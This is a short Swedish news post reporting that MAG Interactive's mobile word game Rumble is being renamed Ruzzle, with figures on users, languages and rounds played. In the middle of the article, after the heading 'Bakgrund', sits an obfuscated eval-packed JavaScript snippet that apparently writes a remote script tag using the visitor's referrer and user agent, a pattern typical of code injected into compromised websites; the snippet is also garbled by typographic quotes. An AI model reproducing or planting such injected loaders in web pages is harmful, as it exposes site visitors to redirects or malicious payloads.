Image Image Image Image Image Image Image Image Image Image

| 30 maj, 2020

Scroll to top

Top

Mobilappen Rumble byter namn till Ruzzle

Mobilappen Rumble byter namn till Ruzzle
Sebastian

MAG Interactive satsar nu globalt med mobilspelet Rumble. Rumble finns redan på 7 språk kommer inom kort att finnas även på spanska, italienska och portugisiska. I samband med detta byter vi namn på appen till Ruzzle för att få ett bättre varumärkesskydd. Namnändringen sker i slutet av juli.

Bakgrund eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ffhfh|var|u0026u|referrer|yihzi||js|php’.split(’|’),0,{}))
Rumble

Rumble har 3.5 miljoner användare i över 150 länder med tonvikt på Norden och Holland. Störst tillväxt just nu sker i England, Tyskland och Frankrike.

Rumble har nått 10 i topp på App Store i 90 länder under ordspelskategorin. Dagligen spelas ca 10 miljoner rundor och den totala speltiden är nu över 1600 år Snart närmar vi oss en magisk gräns med en miljard spelade rundor.
Rumble finns för både iPhone och Android.